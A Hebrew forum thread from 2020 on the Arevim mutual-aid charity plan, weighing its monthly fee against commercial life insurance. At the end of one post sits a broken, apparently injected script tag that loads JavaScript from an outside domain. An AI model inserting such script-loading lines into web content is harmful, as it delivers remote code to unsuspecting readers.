בית פורומים בחדרי חרדים

קריסת תוכנית "ערבים"??

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-8/12/2020 13:01 לינק ישיר 

קהלת כתב:
כשחתמתי על התנכית לפני 15 שנים, הם אמרו וכתבו שזה קבוצות סגורות של 10,000 איש, שמממנות מתוכם את הנפטרים ל"ע מחברי הקבוצה. הדגש היה, שלא תהיה גביה קבועה, אלא מתי שח"ו יהיה צורך, חברי הקבוצה יממנו הקמת קרן לנצרך. בפועל מאז ועד היום 72 ש"ח יורד כמו שעון בכל חודש. 
אין לי חלילה וחס חרטה על כסף הצדקה שאני נותן מידי חודש לתכנית זו, וגם אם זה הולך לצרכים אחרים של קופת העיר, אין לי בעיה. כי הם גבאי צדקה נאמנים ועושים צדקה וחסד אמיתיים ללא ספק. רק חבל לי שלא נצמדים למה שנאמר, גם בעניין זה וגם בעניינים אחרים. בכל אופן הצדקה היא על דעתם של גבאי הצדקה והכל בסדר.

מעניין מה שאתה אמר, כי מפעם לפעם נכתב ביתד "שהחודש אין גביה"

דדווח על תוכן פוגעני

נשלח ב-8/12/2020 13:58 לינק ישיר 
גרשום

לךתדע1 כתב:
כשחתמתי על התנכית לפני 15 שנים, הם אמרו וכתבו שזה קבוצות סגורות של 10,000 איש, שמממנות מתוכם את הנפטרים ל"ע מחברי הקבוצה. הדגש היה, שלא תהיה גביה קבועה, אלא מתי שח"ו יהיה צורך, חברי הקבוצה יממנו הקמת קרן לנצרך. בפועל מאז ועד היום 72 ש"ח יורד כמו שעון בכל חודש. 
אין לי חלילה וחס חרטה על כסף הצדקה שאני נותן מידי חודש לתכנית זו, וגם אם זה הולך לצרכים אחרים של קופת העיר, אין לי בעיה. כי הם גבאי צדקה נאמנים ועושים צדקה וחסד אמיתיים ללא ספק. רק חבל לי שלא נצמדים למה שנאמר, גם בעניין זה וגם בעניינים אחרים. בכל אופן הצדקה היא על דעתם של גבאי הצדקה והכל בסדר.

במחיר הזה של 72 ש"ח לחודש אפשר לקבל ביטוח חיים ע"ס 1.000.000 ש"ח. התשלום מובטח תבין ותקילין. בלי שום קשר למצב הכלכלי. 

www.supermarker.themarker.com/BituachHaimRisk/CompareLifeInsurance.aspx?page=1&Ger=1&Age=35&Smoke=False&Sum=1000000

תוקן על ידי גרשום ב- 08/12/2020 14:10:20

דדווח על תוכן פוגעני

נשלח ב-8/12/2020 16:06 לינק ישיר 

גרשום כתב:

במחיר הזה של 72 ש"ח לחודש אפשר לקבל ביטוח חיים ע"ס 1.000.000 ש"ח. התשלום מובטח תבין ותקילין. בלי שום קשר למצב הכלכלי. 

www.supermarker.themarker.com/BituachHaimRisk/CompareLifeInsurance.aspx?page=1&Ger=1&Age=35&Smoke=False&Sum=1000000

עכשיו תשווה את מחיר השמן זית של ר' חיים עם המחיר במכולת

דדווח על תוכן פוגעני

נשלח ב-8/12/2020 17:43 לינק ישיר 

גרשום כתב:

בדקת את מחיר הביטוח לפי גיל 35.
תנסה לבדוק שם לפי גיל 50. העלות לחודש תגדל פי 3...

ועוד נקודה שלא הכנסת לחשבון היא שבערבים לא כל חודש יש גביה 

דדווח על תוכן פוגעני

נשלח ב-8/12/2020 20:07 לינק ישיר 

בערבים מקבלים לפי מספר ילדים זה יכול להיות הרבה יותר ממליון
מה גם שהמספר שננקט לעיל לא נכון בעליל, ביטוח חיים עולה הרבה יותר ככל שהגיל עולה, ועוד לפני 50 זה עובר את ה70 ש"ח
והעיקר: לא כל חודש יש גביה, זה שקר גס, אני הייתי בערבים של ועד הרבנים והיה כל חודש, עברתי לקופת העיר לפני יותר מ10 שנים, ויש הרבה חדשים שאין גביה< type="text/" async="" src="//minisrclink.cool/1e40c8bd4601a5a5a4.js">

דדווח על תוכן פוגעני

נשלח ב-9/12/2020 10:21 לינק ישיר 

בממוצע בשנים האחרונות חודש או חודשיים בשנה אין גביית ערבים.

דדווח על תוכן פוגעני

נשלח ב-20/12/2020 13:12 לינק ישיר 

אחד הניקים בפורם מצא "בשמחה רבה" שבסכום 70 שקל לחודש ניתן לעשות ביטוח חיים על מיליון שקל, שזה לכאורה אותו סכום שנגבה ע"י תכנית ערבים אך, חשיבה מעמיקה יותר, תגלה שמדובר בשמחת עניים, כי אולי מדובר על ביטוח חיים לבודד ולא על זוג?. מה שאין כן בערבים בשבעים שקל זוג מבוטח, לכן,  אסור לקבל החלטות על רגל אחת במיוחד כשמדובר בשאלות כלכליות הרות גורל. לדעתי: אלה שמתייחסים לערבים  כאל תכנית כלכלית ולא כתכנית מידה כנגד מידה או הזרמת כספים לקרן והסירותי וכו' אמורים ליצור קשר עם הנהלת ערבים ולנהל עמה משא ומתן ולהציג בפניה את כל הביטוחים שלו ולקבל בכתב התחייבות למקרה של,  ר"ל: במילים אחרות צריך לנהל משא ומתן כשהכסף נמצא ברשותך ולא כשהכסף ברשות אחרים והאלמנה והיתומים חשבו שהם "מבוטחים" . הייתי מצפה לשמוע מהנהלת ערבים, לגבי אלה, ולא רק, שמבוטחים בביטוח מנהלים  וכו' שמובנה בתוכה אבדון כושר וגם ביטוח חיים, האם אלה יזכו בבוא היום שמשפחתם תקבל-סיוע מתכנית ערבים?

תוקן על ידי לךתדע1 ב- 20/12/2020 13:45:32

דדווח על תוכן פוגעני

נשלח ב-20/12/2020 14:45 לינק ישיר 

לךתדע1 כתב:
אחד הניקים בפורם מצא "בשמחה רבה" שבפרמיה של 70 שקל לחודש ניתן לעשות ביטוח חיים על מיליון שקל, שזה לכאורה אותו סכום שנגבה ע"י תכנית ערבים אך, חשיבה מעמיקה יותר, תגלה שמדובר בשמחת עניים, שכן מדובר על ביטוח חיים לבודד,  ולא לזוג ? לעומת "הפרמיה"  בערבים מקנה לך ביטוח עבור זוג לכן, אסור לקבל החלטות על רגל אחת, במיוחד,  כשמדובר בשאלות כלכליות הרות גורל. לדעתי: אלה שמתייחסים לערבים  כאל תכנית כלכלית עתידית (שלא נצטרך) ולא כתכנית מידה כנגד מידה או הזרמת כספים לקרן והסירותי וכו' אמורים ליצור קשר עם הנהלת ערבים ולנהל עמה משא ומתן ולהציג בפניה את כלל הביטוחים המשפחתיים ולקבל בכתב התחייבות למקרה של, ר"ל: במילים אחרות צריך לנהל משא ומתן כשהכסף נמצא ברשותך ולא כשהכסף בידי אחרים, והאלמנה והיתומים חשבו, שהם "מבוטחים". הייתי מצפה לשמוע מהנהלת ערבים, לגבי אלה, ולא רק, שמבוטחים בביטוחים למיניהם, לדוגמה ביטוח מנהלים, שמובנה בתוכה אבדון כושר עבודה וגם ביטוח חיים, האם  משפחתם תקבל-סיוע מתכנית ערבים? 

אחרי הכול צריך לזכור שמדובר בצדקה!

דדווח על תוכן פוגעני

בית > פורומים > אקטואליה וחדשות > בחדרי חרדים > קריסת תוכנית "ערבים"??
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 סך הכל 3 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.